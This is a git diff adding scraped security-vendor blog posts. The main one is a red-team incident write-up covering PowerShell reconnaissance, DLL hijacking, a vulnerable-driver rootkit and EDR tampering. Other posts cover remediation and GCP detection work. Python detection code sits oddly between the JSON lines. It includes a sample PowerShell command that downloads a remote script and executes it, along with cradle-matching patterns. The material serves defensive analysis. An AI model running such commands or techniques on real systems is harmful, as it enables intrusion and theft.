We then make the associated Notebook available for engineers or other internal researchers to play with the concepts in more depth. To successfully use Notebooks to socialize research, consider the following: Notebooks should be optimized for the reader to understand, not for the developer. This means you might have to violate the DRY (Do not Repeat Yourself) principals (oh em gee\u2026) Notebooks should be optimized for the reader to understand, not for porting to production. This means you might not have loops collapsed on one line (oh em gee again\u2026) Code should be well documented. Yes \u2013 prototypers, it\u2019s possible to have more than one comment per 100 lines of code \ud83d\ude42 Markdown cells should exist around code cells. The text in these cells isn\u2019t about the implementation of the code in the cell below (that\u2019s what comments are for). It\u2019s telling a story for the reader at a higher level, helping think about the cell relative to the research objective. Meeting mojo Our weeks without meetings are meant to shock the system and make us more intentional about our meeting choices. It\u2019s often the pause we need to rethink our meeting mojo and figure out how we can reduce the time and energy burden of meetings on ourselves and our teams going forward. That\u2019s where the tools I\u2019ve discussed come into play. If you\u2019ve read this far, hopefully you\u2019ve found one tip or tool you can carry forward into your day-to-day to reduce the meeting burden on yourself or your team. Have other tools that help you minimize meetings while still communicating and collaborating effectively? We\u2019d love to hear about them \u2014 drop us a note !" +} \ No newline at end of file diff --git a/how-a-red-team-went-from-domain-user-to-kernel-memory.json b/how-a-red-team-went-from-domain-user-to-kernel-memory.json new file mode 100644 index 0000000000000000000000000000000000000000..760ddb0354b9e8a7fecef1280c375b19d4e1da24 --- /dev/null +++ b/how-a-red-team-went-from-domain-user-to-kernel-memory.json @@ -0,0 +1,6 @@ +{ + "title": "How a red team went from domain user to kernel memory", + "url": "https://expel.com/blog/well-that-escalated-quickly-how-a-red-team-went-from-domain-user-to-kernel-memory/", + "date": "Jul 28, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Well that escalated quickly: How a red team went from domain user to kernel memory Security operations \u00b7 9 MIN READ \u00b7 BRITTON MANAHAN \u00b7 JUL 28, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools We\u2019re no strangers to red team engagements. In fact, we love them . Not only do they give our customers a chance to put our detection and response (D&R) skills to the test, they also let us exercise our incident response skills. And this red team definitely gave us a workout as they progressed towards full control of the computer system. Their goal was to evaluate our detection methodology and incident response (IR) proficiency; and they did so using a number of interesting and unique tools and techniques. The red team was given physical access to a computer on the customer\u2019s network and a valid domain user to unleash their havoc. We\u2019ll refer to the computer as \u201cCompromised_Host\u201d and the valid user account as \u201cUser1\u201d from here on out. The incident began with some PowerShell-based reconnaissance and ended with the red team loading custom code into kernel memory on the system \u2013 aka a rootkit. 
In this blog post, I\u2019ll walk you through the initial detection, our investigation and share the insights we uncovered along the way. Incoming! Threat detection TL; DR: We detected malicious PowerShell usage by the red team and notified the customer in eight minutes. Our initial lead into the red team activity began with an endpoint alert based on a lightly obfuscated PowerShell command that attempted to download the PowerView privilege escalation framework from the PowerShell Empire PowerTools Github repository. In the image below, you\u2019ll see that this attempted download and in-memory execution of malicious PowerShell was blocked by the EDR product deployed on Compromised_Host. Expel Alert Details Here\u2019s the full PowerShell process command line and the deobfuscated remote URL: PowerShell Command for Alert When the URL is deobfuscated it appears as: https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1 Our analysts quickly determined this alert to be a true positive because: The command line parameter \u201c-ep Bypass\u201d bypasses any Script Execution Policy restrictions in place for the generated PowerShell process. The command downloads reconnaissance functionality from the well-known post-exploitation framework repository PowerShellEmpire. After the download completes, the command runs an imported function, Invoke-ShareFinder, with a parameter telling it to enumerate all network file shares readable by the current user. The download and execution of this function, Invoke-ShareFinder, intentionally operates exclusively in working memory and does not get stored to persistent storage (although the output does). If this PowerShell command was successful, it would have executed the Invoke-ShareFinder function provided by powerview.ps1. With a clear indication of malicious activity, it was time to notify our customer. Our analysts have a direct line of communication with our customers (through Slack or Microsoft Teams depending on which platform they use) \u2013 so within eight minutes, we went from initial alert to giving our customer details of the activity. Then our analysts initiated a verification drop to our customer through the Expel Workbench\u2122. From there, our customer authorized the activity and confirmed that a red team assessment was underway. Want to know what our verification drop looks like? Here\u2019s the Slack message to our customer: Verification communication with customer over Slack And below is our Alert-to-fix timeline, available for our customers in the Expel Workbench\u2122. Expel Workbench\u2122 alert-to-fix report Signs of a rootkit: Start of our investigation TL;DR: The installation of a suspicious Windows Driver immediately stood out to us when examining the host timeline. This activity would provide an attacker with unrestricted access to memory on the computer. During our initial escalation and communication, we also generated a timeline for the Compromised_Host endpoint. After inspecting the timeline generated through the EDR solution running on the computer, something immediately stood out to us. 
EventName : CreateService ComputerName : Compromised_Host ProductType : 1 ServiceDisplayName : GuteDriver ServiceErrorControl_decimal : 1 ServiceImagePath : C:\\Users\\User1\\Desktop\\Purple\\Payloads\\bp\\Gute0.2\\Gute0.2\\GuteDriver.sys ServiceStart : 4 ServiceType : 1 Time : 2021-04-20T15:33:56.794+0000 GuteDriver Rootkit Service Creation This Windows service creation event tells us that GuteDriver.sys is being registered as a kernel driver, set to begin execution during system initialization based on the values of ServiceType and ServiceStart . This means that the red team got kernel-level access to the computer system. Gaining kernel-level access allows unrestricted access to all working memory (aka RAM) on the computer system. Malware that operates at this level is also referred to as a rootkit. The file hash for GuteDriver.sys, obtained from the corresponding FileWrite event, was globally unique in the EDR product and unknown in VirusTotal and other OSINT sources. Also, the fact that the Driver\u2019s location ran through User1\u2019s Desktop was a huge red flag. It\u2019s a complete anomaly for a Windows kernel driver to be located on a user\u2019s desktop. Initial red team activity TL;DR: The red team, which provided physical access to the Compromised_Host system and a logon session for User1, began their engagement by downloading Payloads.zip from dl.boxcloud.com. With the malicious Windows driver activity identified, we continued to examine the host timeline with the initial tasks of locating the beginning of the red team activity and any potential lateral movement to other computer systems. While no signs of successful lateral movement were present in the timeline, we noticed a series of file write events involving the path C:\\Users\\User1\\Desktop\\Purple\\Payloads. We then honed in on the events related to this path and determined that the earliest evidence of red team activity occurred earlier in the day at 14:33 UTC on the Compromised_Host computer system with the downloading of the file Payloads.zip into the Downloads folder of User1. This activity was immediately preceded by User1 launching a Chrome web browser process at 14:29 UTC, which then generated a DNS request for dl.boxcloud.com. This timeline of events suggests that it\u2019s highly likely that the archive file was hosted on and downloaded from the cloud storage service Box.com. The contents of Payloads.zip were then extracted into a new folder, Payloads, located within the folder Purple on User1\u2019s Desktop. These extracted files were the source of additional tools and tactics deployed by the red team, which we\u2019ll be exploring together in the next sections of this blog post. System reconnaissance TL;DR: The red team used PowerShell and DotNet to locate local privilege escalation opportunities on the Compromised_Host endpoint. The first events after the extraction of the contents of Payloads.zip are the compilation and immediate deletion of a DotNet Framework module with a file name of ibuyy111.dll. 
Dotnet Module Compilation Event: DeviceHarddiskVolume4WindowsMicrosoft.NETFramework64v4.0.30319csc.exe \"C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe\" /noconfig /fullpaths @\"C:UsersUser1AppDataLocalTempibuyy111.cmdline\" File Creation Time: 4/20/2021 14:36:25 UTC File Deletion Time: 4/20/2021 14:36:25 UTC ibuyy111.dll details With a parent process of PowerShell.exe and the immediate deletion of the compiled DotNet module, this command line directly correlates to PowerShell invoking the C# Command-Line Compiler behind the scenes as a result of importing a new DotNet class through C# source code (yes \u2013 PowerShell can do that). This functionality is made possible through the add-type PowerShell cmdlet, which supports inline C# source code through the TypeDefinition parameter. powershell -Command \u201cAdd-Type -TypeDefinition \u201dpublic class Demo {public int a;}\u201d To find out more about the PowerShell activity on the host, we used the PSReadLine console history file, which maintains a record of PowerShell commands entered into an interactive PowerShell console session for each user account. This file exists so that the PSReadLine module, which is included by default with Windows 10, can provide command line history functionality for PowerShell in-line with the Linux BASH shell. From the PSReadLine console history file for User1 we saw that the following command was entered: Import-Module .Vscanner.ps1 > Vulns.txt While this evidence source does not include timestamps, based on the creation time of the Vulns.txt file we had from the timeline, this command was likely the origin of the DotNet module activity. Based on the name Vscanner.ps1 and created file names Vulns.txt, along with interesting paths.txt, the main objective of Vscanner.ps1 and ibuyy111.dll was discovering potential privilege escalation vulnerabilities on the Compromised_Host computer system. Blockedfailed executions TL;DR: The red team attempted but failed to perform a DNS Zone Transfer and had additional reconnaissance tools blocked by EDR. After they succeeded at enumerating local privilege opportunities, the red team failed in their next three execution attempts. The first of these attempts was a failed DNS Zone Transfer, followed by the previously mentioned blocked attempt to download and execute PowerView, which was our initial lead into the presence of the red team. The third unsuccessful execution activity was two attempts to bypass detection of the SharpHound tool by employing obfuscation. SharpHound is the C# version of BloodHound , a penetration testing tool for enumerating active directory accounts and how their permissions overlap through graph theory. The red team attempted to import and execute two different obfuscated copies of SharpHound as a PowerShell module, a fact supported by the PSReadLine history file excerpt provided below. Both attempts were detected and blocked by EDR, which also created an Expel Alert. Import-Module .sh-obf1.ps1 Import-Module .sh-obf2.ps1 invokE-BloOdhOuNd Import-Module .sh-obf2.ps1 invokE-BloOdhOuNd Bloodhound related section of PSReadLine History File Privilege escalation TL;DR: The red team used DLL load order hijacking to execute a custom DLL file under the Local System account and then create a new local admin user. They likely got the information used to conduct this local privilege escalation from VScanner.ps1. 
Following this series of failed execution attempts, the red team then used information likely gained from their earlier successful privilege escalation enumeration. At 15:09 UTC, the red team wrote the WptsExtensions.dll file extracted from Payloads.zip into the directory C:Program FilesCitrixICAService in order to establish DLL load order hijacking. We spotted this when comparing the following two FileWrite events for WptsExtensions.dll, which have the same file hash. EventName : FileWrite ComputerName : COMPROMISED_HOST FileName : WptsExtensions.dll FilePath : DeviceHarddiskVolume4UsersUser1DesktopPurplePayloadsPayloads CompleteFilePath : DeviceHarddiskVolume4UsersUser1DesktopPurplePayloadsPayloadsWptsExtensions.dll SHA256Hash: 9f2470188c30deec39f042fddfdb94bef1e69fb7b842858de7172f5e6d58140e Time : 2021-04-20T14:34:08 EventName : FileWrite ComputerName : COMPROMISED_HOST FileName : WptsExtensions.dll FilePath : DeviceHarddiskVolume4Program FilesCitrixICAService CompleteFilePath : DeviceHarddiskVolume4Program FilesCitrixICAServiceWptsExtensions.dll SHA256Hash: 9f2470188c30deec39f042fddfdb94bef1e69fb7b842858de7172f5e6d58140e Time : 2021-04-20T15:09:23 FileWrite events for WptsExtensions.dll Following this DLL load order hijacking setup, several Citrix-related service processes were started, which would have likely loaded this DLL, running under the SYSTEM user context. This activity was then preceded by the User1 account launching a new cmd process under the context of the LocalAdmin1 account. DeviceHarddiskVolume4WindowsSystem32runas.exe runas /user:LocalAdmin1 cmd Privilege escalation to local admin account The red team report \u2013 a summary of actions performed during the engagement \u2013 confirmed that this malicious DLL used the higher permissions obtained through DLL load order hijacking to covertly create a new local admin account on the computer system. Kernel memory access TL;DR: The red team installed and exploited an old Intel driver to bypass the Windows Driver Signature Enforcement protection and install their own custom driver. Using this custom code running in the kernel memory space, the red team disabled the EDR solution running on the endpoint. As the title suggests, things escalated quickly. With their privileges on the Compromised_Host system elevated to local administrator, the red team wasn\u2019t yet satisfied with their heightened control of the system. Working through the LocalAdmin1 account, the red team disabled two local services running on the Compromised_Host system \u2013 a Splunk forwarder service and a service for a third-party IR vendor. Then they launched the executable program Gute.exe at 15:29 UTC, another file hash with zero global matches in the EDR solution and across OSINT. The EDR details for this event let us know that the Gute.exe process was responsible for both writing and registering the Windows Driver file NalDrv.sys at 15:31 UTC. The hash for this file \u2013 4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b \u2013 did return results when searching across Virustotal and other OSINT sources. VirusTotal Match for the NalDrv.sys file hash The NalDrv.sys file, original file name iQVW64.SYS, is a signed Intel driver from 2013 that isn\u2019t inherently malicious. What this driver can provide an attacker is based on a combination of its valid driver signature and established vulnerability #CVE-2015-2291 . 
This combination allows an attacker to turn the authentic driver into a vehicle to access and modify kernel-level memory on the local computer system. An example of this technique is the Kernel Driver Utility , which includes this exact CVE as one of the vulnerabilities it can leverage to provide access into kernel memory from user mode. One of the many things you can do with this unrestricted level of access is bypass the Windows Driver Signature Enforcement and load any driver of your choosing into kernel mode. This Gute.exe and NalDrv.sys activity brings us back full circle to the unknown Gutedriver.sys file mentioned earlier in this post, which was installed as a Windows driver service two minutes after the NalDrv.sys activity at 15:33 UTC. We didn\u2019t notice anything happening on the Compromised_Host system after this activity. The red team report confirmed that this system kernel-level access was used to disable the EDR solution running on Compromised_Host. With the red team activity limited to the Compromised_Host and our visibility cut off with the disabling of EDR, we concluded our investigation. The red team report also showed us that the red team successfully executed mimikatz and obtained plaintext passwords after disabling EDR on the host. In a real-world critical incident, the box would have been isolated prior to the activity that provided the red team access to kernel-level memory. However, it\u2019s common practice not to disrupt red teams during their engagements because it ensures security controls across the attack lifecycle are examined regardless of results in the previous phase. Quick recap We just went through a lot of technical info. To make it easier to digest, we figured it would be helpful to give a short recap of what went down. Below is a detailed timeline of this red team incident, broken down into both their actions on the computer system Compromised_Host and our communications with the customer during the incident. Red team incident timeline What this means for you This red team engagement serves as a strong reminder that the alert is often the tipping point, but not the full story. While the incident began with an unsophisticated PowerShell download cradle, it quickly escalated into something that could have been a serious incident in the real world. If this was a real attack, it would have been difficult for any org to prevent and contain. That\u2019s especially true when considering a custom rootkit was deployed and EDR was disabled on the system. Bad actors are getting creative and have the ability to surprise you with novel attack techniques. This is why you need to have an equally creative mindset when it comes to detection and investigation. And, again, it\u2019s why we love red teams. Bringing in a red team to test your security controls and protocols against the latest tactics can help you keep bad actors out down the road. Have any interesting red team stories you\u2019d like to share? We\u2019d love to hear them! Let\u2019s chat (yes \u2013 a real human will respond)."
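To make the detection ideas from this engagement a little more concrete, here is a minimal Python sketch (not our production logic; the event shape and field names are assumptions) that flags two of the behaviors described above: a PowerShell download cradle that bypasses execution policy, and a kernel driver service registered out of a user profile path.

import re

# Hypothetical, simplified EDR event shapes -- the field names here are illustrative only:
#   {"type": "ProcessRollup", "cmdline": "..."}
#   {"type": "CreateService", "service_type": 1, "image_path": "..."}   (1 = kernel driver)

CRADLE_PATTERNS = [
    r"(?i)-e(nc|p)\b",                               # -enc / -ep (encoded command or execution policy bypass)
    r"(?i)downloadstring|invoke-webrequest|iwr\s",   # in-memory download cradles
    r"(?i)raw\.githubusercontent\.com",              # raw-repo fetches like the PowerView pull above
]

USER_WRITABLE = re.compile(r"(?i)\\users\\[^\\]+\\(desktop|downloads|appdata)\\")

def flag_powershell_cradle(cmdline: str) -> bool:
    """Flag PowerShell command lines that look like download-and-execute cradles."""
    if "powershell" not in cmdline.lower():
        return False
    return sum(bool(re.search(p, cmdline)) for p in CRADLE_PATTERNS) >= 2

def flag_user_path_driver(event: dict) -> bool:
    """Flag kernel driver services whose image path sits under a user profile (like GuteDriver.sys)."""
    return (
        event.get("type") == "CreateService"
        and event.get("service_type") == 1
        and bool(USER_WRITABLE.search(event.get("image_path", "")))
    )

if __name__ == "__main__":
    events = [
        {"type": "ProcessRollup",
         "cmdline": "powershell -ep Bypass -c IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/...')"},
        {"type": "CreateService", "service_type": 1,
         "image_path": r"C:\Users\User1\Desktop\Purple\Payloads\bp\GuteDriver.sys"},
    ]
    for e in events:
        if e["type"] == "ProcessRollup" and flag_powershell_cradle(e["cmdline"]):
            print("suspicious PowerShell cradle:", e["cmdline"][:60], "...")
        if flag_user_path_driver(e):
            print("kernel driver registered from a user profile path:", e["image_path"])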
+} \ No newline at end of file diff --git a/how-does-your-approach-to-aws-security-stack-up.json b/how-does-your-approach-to-aws-security-stack-up.json new file mode 100644 index 0000000000000000000000000000000000000000..1b89433ecbca314da89bb4827d4f57b9b9b87e6b --- /dev/null +++ b/how-does-your-approach-to-aws-security-stack-up.json @@ -0,0 +1,6 @@ +{ + "title": "How does your approach to AWS security stack up?", + "url": "https://expel.com/blog/how-does-your-approach-to-aws-security-stack-up/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG How does your approach to AWS security stack up? Security operations \u00b7 1 MIN READ \u00b7 MASE ISSA \u00b7 APR 27, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Keeping track of Amazon Web Services (AWS) and its new services can be overwhelming. And on top of dealing with a tangled web of services and logs, triaging alerts can feel like you\u2019re playing an exhausting game of whack-a-mole. Nodding your head in agreeance? You aren\u2019t alone. We\u2019ve heard the same thing from many orgs, regardless of size and industry \u2013 wrangling cloud security signal isn\u2019t easy. To put it mildly. It can be time consuming, confusing and downright frustrating. Wondering if you might need some help? Or want to know if there are opportunities to level up but not sure where to start? We got you. Introducing Expel\u2019s interactive quiz to help you figure out if you\u2019re getting the most out of your Amazon Web Services (AWS) security signal. Answer a few short questions and we\u2019ll let you know how you compare to similar orgs. As a bonus we\u2019ll give you some tips and resources. So whether you\u2019re just starting out or pretty sure you\u2019re killing the game \u2013 check out our quiz to make sure you\u2019re maximizing all available resources to secure your cloud. Protect AWS" +} \ No newline at end of file diff --git a/how-expel-does-remediation.json b/how-expel-does-remediation.json new file mode 100644 index 0000000000000000000000000000000000000000..31f727e9661ef8b7e1eb2016793646d7d7752967 --- /dev/null +++ b/how-expel-does-remediation.json @@ -0,0 +1,6 @@ +{ + "title": "How Expel does remediation", + "url": "https://expel.com/blog/how-expel-does-remediation/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG How Expel does remediation Security operations \u00b7 4 MIN READ \u00b7 NABEEL ZAFAR AND PATRICK DUFFY \u00b7 MAY 31, 2022 \u00b7 TAGS: MDR TL;DR How our two-step remediation process works (with a flowchart), what we can remediate, and how we keep you in the loop. Who does what \u2013 Expel or you? (Hint: most of the time, you decide.) Our remediation roadmap (Blocking command-and-control (C2) communications, cloud turnoffs, disabling/modifying AWS access keys). Tips on what to ask any MDR provider about remediation. \u201cIf you find a problem in our environment, how do you remediate it?\u201d We get that question a lot. As we should \u2014 that\u2019s one of the most important questions to ask when you\u2019re looking for a managed detection and response (MDR) provider. So here\u2019s our answer to this question. In this blog post, we\u2019ll share Expel\u2019s two-step remediation process, provide insight into our automated remediation offerings, and give you a glimpse of what\u2019s ahead on our roadmap. Our remediation process If we identify an incident, there are two sets of actions we\u2019ll take \u2013 while keeping you in the loop throughout the process. 
First, we\u2019ll take approved actions on your behalf to quickly address the incident. For example, the Expel Workbench\u2122 can automatically perform host containment, user account disablement, block known bad hashes, or remove suspicious emails when necessary during our security operations center (SOC) analysts\u2019 investigation. If these automated remediation actions make sense, we quickly take first steps to contain infected hosts. In the image below, you\u2019ll see an example of what this looks like in the Expel Workbench. Expel Workbench host containment action You can also customize the remediation process through Workbench (see image below) by identifying hosts that you\u2019d like us to act on \u2014 and any you don\u2019t \u2014 for future remediation actions. They also share updates on their activity in Workbench each step of the way. Expel Workbench containment options Expel supports host containment for customers who have CrowdStrike, Microsoft Defender for Endpoint, SentinelOne Singularity Complete, VMware Carbon Black Cloud, VMware Carbon Black EDR, Palo Alto Cortex XDR Pro, Elastic Endpoint Security, and Cybereason. Second, after taking automatic actions on your behalf, our SOC analysts recommend additional remediation actions in our findings report. We always communicate in plain English, so our recommendations are easy to follow and can be implemented at any level of security expertise. Want a 10-second overview of what our remediation process looks like? We got you covered. Check out our remediation workflow in the diagram below. Expel remediation workflow Me or my MDR: Who does what? A lot of security practitioners who\u2019ve purchased MDR services still want to maintain internal control of remediation steps. It helps reduce business risk. We get it. We\u2019ve found that our process strikes a balance between what security practitioners want to handle themselves and what they\u2019d want their MDR to do. But that doesn\u2019t mean they shouldn\u2019t look to their MDR to share their expertise. We want your team to maximize your security and minimize incidents \u2014 and not spend a ton of time trying to figure out how to remediate. So if we spot trends in vulnerabilities or incidents across your environment, we\u2019ll tailor resilience recommendations for how your org can fix the root cause of those issues and prevent them from needing remediation time after time. Taking steps to improve your security and keep those types of incidents from happening again helps us avoid having to call you in the middle of the night about remediation actions you need to take \u2014 right now! What else can we auto remediate? From business email compromise to malicious files to ransomware, we\u2019ve got you covered. You tell us what you\u2019d like us to remediate and which ones you\u2019d prefer to handle. Plus, 24\u00d77 coverage means you have the time to plan your next steps\u2026 even if that means waiting until Monday morning. Our approach to automated remediation is personal to your organization and based on the frequency of threats seen in your environment. You\u2019re in control of which users and endpoints you\u2019d like us to immediately take offline after a compromise is confirmed, so you\u2019re involved when you want to be \u2014 freeing up your team to focus on other security initiatives. 
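To illustrate the kind of guardrail described above, here is a minimal Python sketch of an auto-containment decision. The policy fields and the contain_host stub are hypothetical stand-ins, not the Expel Workbench implementation or any specific EDR API.

# Hypothetical policy shape -- field names are illustrative, not an actual Workbench schema.
CUSTOMER_POLICY = {
    "auto_containment_enabled": True,
    "never_contain": {"dc01.corp.example.com", "erp-prod-01.corp.example.com"},  # business-critical hosts
}

def should_auto_contain(hostname: str, policy: dict) -> bool:
    """Return True only if the customer opted in and the host isn't on their exclusion list."""
    if not policy.get("auto_containment_enabled"):
        return False
    return hostname.lower() not in {h.lower() for h in policy.get("never_contain", set())}

def contain_host(hostname: str) -> None:
    """Stand-in for an EDR containment call (CrowdStrike, Defender, etc.); purely illustrative."""
    print(f"[workbench] containment requested for {hostname}")

if __name__ == "__main__":
    for host in ["laptop-4821.corp.example.com", "dc01.corp.example.com"]:
        if should_auto_contain(host, CUSTOMER_POLICY):
            contain_host(host)
        else:
            print(f"[workbench] {host} excluded from auto-containment; recommending manual action instead")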
We have a few new automated remediation steps (in addition to the ones outlined above) that consist of additional actions we can automatically take for you when responding to an incident. Removing malicious email If malicious email is identified from a phishing submission, we\u2019ll automatically remove it from users\u2019 inboxes (and into the trash). Available for: Google Workspace Blocking bad hashes When our analysts identify hashes to block during an incident, we create a remediation action in Expel Workbench. If the hash isn\u2019t on your \u201cnever block\u201d list of files, Workbench adds the hash to the appropriate block list in your EDR. Available for: CrowdStrike, VMware Carbon Black Cloud, VMware Carbon Black Response, Microsoft Defender for Endpoint, SentinelOne Singularity Complete, Palo Alto Cortex XDR Pro and Elastic Endpoint Security. Disabling user accounts Similar to host containment, Workbench will automatically disable user accounts when that remediation action is added to an incident. Available for: Microsoft Defender for Endpoint, Microsoft Office 365, Microsoft Azure Identity Protection, Microsoft Active Directory, Microsoft Azure Log Analytics, and Microsoft Azure, Google Workspace, Okta, Github, and Duo. Coming soon We\u2019ve talked you through our remediation process today. But we\u2019re constantly improving what we can do for our customers. So we have a few new automated remediation steps in the works on our remediation roadmap. They consist of additional actions we\u2019ll be able to automatically take for you while responding to an incident. By taking critical, first steps to contain an incident, we decrease your remediation time even further \u2014 lifting more weight off your shoulders. Here\u2019s what\u2019s next in the pipeline, prioritized based on how often we take certain remediation actions across our customer base and the level of risk each presents for our customers. Blocking command-and-control (C2) communications When our SOC identifies C2 communications during an incident, we\u2019ll automatically block them upon creation of a remediation action in Workbench. Available for: Palo Alto Networks, Cisco Umbrella Cloud turn-offs If a cloud instance is identified as compromised during an incident, we\u2019ll automatically shut down the VM or EC2. Available for: AWS EC2 turn-off, Azure VM turn-off Disabling/modifying AWS access keys If an AWS access key is identified as compromised during an incident, we\u2019ll automatically disable/modify that key when a remediation action is created. Available for: AWS Final tips We wanted to end this post with some parting thoughts and tips for those currently looking for an MDR provider. When you\u2019re evaluating MDR providers, make sure you understand how their remediation process works. Will they reduce risk quickly enough to protect your org? What will they do for you when it comes time to remediate an incident vs. what will you be asked to do? Learn about their incident reporting and communication process to know when and how they\u2019ll reach you during an investigation. And make sure you also know how they\u2019ll walk you through remediation. Have any questions? Let\u2019s chat !" 
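For a sense of what the AWS-side roadmap actions above can look like in practice, here is a minimal boto3 sketch of a cloud turn-off and an access key disable. The instance ID, access key ID, and user name are placeholders, and this is an illustration of the underlying AWS calls rather than how Expel Workbench performs them.

import boto3

# Placeholders -- swap in the real resources identified during an incident.
COMPROMISED_INSTANCE_ID = "i-0123456789abcdef0"
COMPROMISED_ACCESS_KEY_ID = "AKIAEXAMPLEKEYID"
KEY_OWNER_USER_NAME = "build-service-account"

def stop_compromised_instance(instance_id: str) -> None:
    """Cloud turn-off: stop an EC2 instance identified as compromised."""
    ec2 = boto3.client("ec2")
    ec2.stop_instances(InstanceIds=[instance_id])

def disable_compromised_access_key(user_name: str, access_key_id: str) -> None:
    """Disable (rather than delete) the key so it can still be audited later."""
    iam = boto3.client("iam")
    iam.update_access_key(UserName=user_name, AccessKeyId=access_key_id, Status="Inactive")

if __name__ == "__main__":
    stop_compromised_instance(COMPROMISED_INSTANCE_ID)
    disable_compromised_access_key(KEY_OWNER_USER_NAME, COMPROMISED_ACCESS_KEY_ID)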
+} \ No newline at end of file diff --git a/how-expel-goes-detection-sprinting-in-google-cloud.json b/how-expel-goes-detection-sprinting-in-google-cloud.json new file mode 100644 index 0000000000000000000000000000000000000000..c0a4e007c1c654fa188fa1285c66826d09bab224 --- /dev/null +++ b/how-expel-goes-detection-sprinting-in-google-cloud.json @@ -0,0 +1,6 @@ +{ + "title": "How Expel goes detection sprinting in Google Cloud", + "url": "https://expel.com/blog/detection-sprinting-google-cloud/", + "date": "Aug 3, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How Expel goes detection sprinting in Google Cloud Security operations \u00b7 6 MIN READ \u00b7 IAN COOPER, CHRISTOPHER VANTINE AND SAM LIPTON \u00b7 AUG 3, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools Let\u2019s face it: Detection and response in the cloud is greenfield. Although it feels like every other month we\u2019re reading about the latest cloud compromise, there are often few details about exactly what happened and what you can do to prevent the same kind of thing happening to you. Follow @sellingshakes Organizations are just getting comfortable figuring out where their attack surface really is in the cloud. For these reasons, Expel\u2019s approach to detection research has required some creativity. How does one build a detection strategy essentially from scratch? In our case, we like to work together to fundamentally understand a new technology, get up to date with where the community has taken the threat research, theorize any additional threat models against that tech and then build a strong overall detection strategy as a team. The Detection and Response Engineering team at Expel in many ways operates like a software team. To help us organize work, we use the Scrum framework and generally operate in one or two week \u201csprints\u201d \u2013 timeboxed iterations of our detection strategies. Recently, we ran a two week Google Cloud Platform (GCP) detection sprint and wanted to share our process. Interested in how you can start building a strategy of your own? Strap in and we\u2019ll take you along for the journey to building this process here at Expel. Our process for building detections Threat modeling and threat research is no small task. We like to take some time here and we usually take the entire first week of our detection sprints to do some reading (hello API docs!), let ideas bake, challenge each other and do any sort of experimentation in cloud infrastructure environments to test security boundaries. In general, our process follows the steps below. Ideate: Throw ideas against a wall. Evaluate: Test the ideas. Create: Release the dragons. Appreciate: Celebrate (and monitor performance). Ideate It all starts with finding inspiration and brainstorming detection ideas. Oftentimes, our detection sprints build upon previous iterations of detection work and research, and the result is a deeper understanding of the technology at hand (and it\u2019s security shortcomings). Follow @iank_cooper One good place to start with GCP, or any cloud infrastructure, is understanding their implementation of Identity and Access Management (IAM). If you\u2019re feeling green in GCP and want to learn how GCP IAM compares to the other cloud providers, Dylan Ayrey and Allison Donovan break it down very well in the beginning of their Defcon talk . In fact, we\u2019ll use one of the attack techniques discussed in their talk as an example as we walk through our detection sprint process. 
GCPloit, a python-based red team tool built by the Defcon presenters, serves to exploit potential imbalances in a given GCP environment. (In fact, cloud red team tools are great starting points to build an initial suite of threat detections). Specifically, the tool takes advantage of the ability to impersonate service accounts \u2013 a dangerous, yet common privilege in GCP. Picking apart the code for GCPloit reveals the specific gcloud commands used to list available service accounts, deploy cloud functions attached to each available service account (necessary to expose the service account credentials), and ultimately capture the credentials to each service account. From there, the attacker can use the service account credentials to impersonate even more accounts, or use the new privileges gained to continue moving towards their goals in a variety of other ways. As discussed in the Defcon talk, it\u2019s possible for an attacker to gain access to multiple GCP projects through this process. Now it\u2019s time to see if we can build a successful detection based on this functionality. Evaluate Once we understand GCP IAM and some of the most impactful security weaknesses at hand, we build and evaluate detections in our testing environment. With cloud detections, one part of our evaluation process includes determining if the detection is looking for attacker behaviors or simply detecting risky configuration changes (although the lines between the two are often blurred). There\u2019s no shortage of open source detections for risky cloud configuration changes. There\u2019s also a whole market that specializes in these (Cloud Security Posture Management anyone?). Our goal for this sprint was to find evil. Plain and simple. We were all in agreement on which attack paths are the scariest and remain readily available for an adversary (malicious service account impersonation\u2026 begone you dastardly monster\u2026). Multiple GCP detection sprints have resulted in detection ideas for a variety of malicious service account impersonation behaviors. Here\u2019s a few examples: Burst in cloud function deployments: Is an attacker programmatically capturing service account credentials? Unusual cloud functions: Are cloud function deployments unusual for this user? Service accounts making org level policy changes: Is an attacker leveraging stolen credentials to gain additional access in the environment? Back to the detection we\u2019re focusing on \u2013 a service account impersonation detection. Remember, cloud functions deployments can be used by the attacker to capture new credentials while impersonating a service account. So what data do we need to effectively write a detection for this? Let\u2019s hone in on what native log data exists in GCP . Finding the right sources of evidence GCP provides several log sources, but not all translate into effective detection sources. System Event audit logs: Capture machine data, but not user actions. Data Access audit logs: Record granular resource access (typically not enabled due to high volume). Admin Activity audit logs: Capture control plane changes (including user actions). For these particular attacker behaviors, the Admin Activity log includes the evidence we need to write our detections. Since these logs capture configuration changes to resources in GCP, they give us insights into the events we want to correlate when searching for evil. For example, when a cloud function is deployed, we can track this activity through the Admin Activity audit log. 
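As a rough illustration of what that looks like in practice, here is a minimal Python sketch that picks cloud function deployments (and who performed them) out of Admin Activity audit log entries that have already been exported as JSON. The field layout follows GCP's audit log structure, but treat the exact methodName string as an assumption, since it can vary by API version:

```python
# Minimal sketch: find cloud function deployments, and the principal behind them,
# in exported Admin Activity audit log entries. The methodName value below is an
# assumption and may differ by API version.
import json

DEPLOY_METHODS = {
    "google.cloud.functions.v1.CloudFunctionsService.CreateFunction",  # assumed value
}

def cloud_function_deployers(log_lines):
    """Yield (principal_email, function_resource) for each deployment event."""
    for line in log_lines:
        entry = json.loads(line)
        payload = entry.get("protoPayload", {})
        if payload.get("methodName") in DEPLOY_METHODS:
            who = payload.get("authenticationInfo", {}).get("principalEmail", "unknown")
            what = payload.get("resourceName", "unknown")
            yield who, what

if __name__ == "__main__":
    sample = [json.dumps({
        "protoPayload": {
            "methodName": "google.cloud.functions.v1.CloudFunctionsService.CreateFunction",
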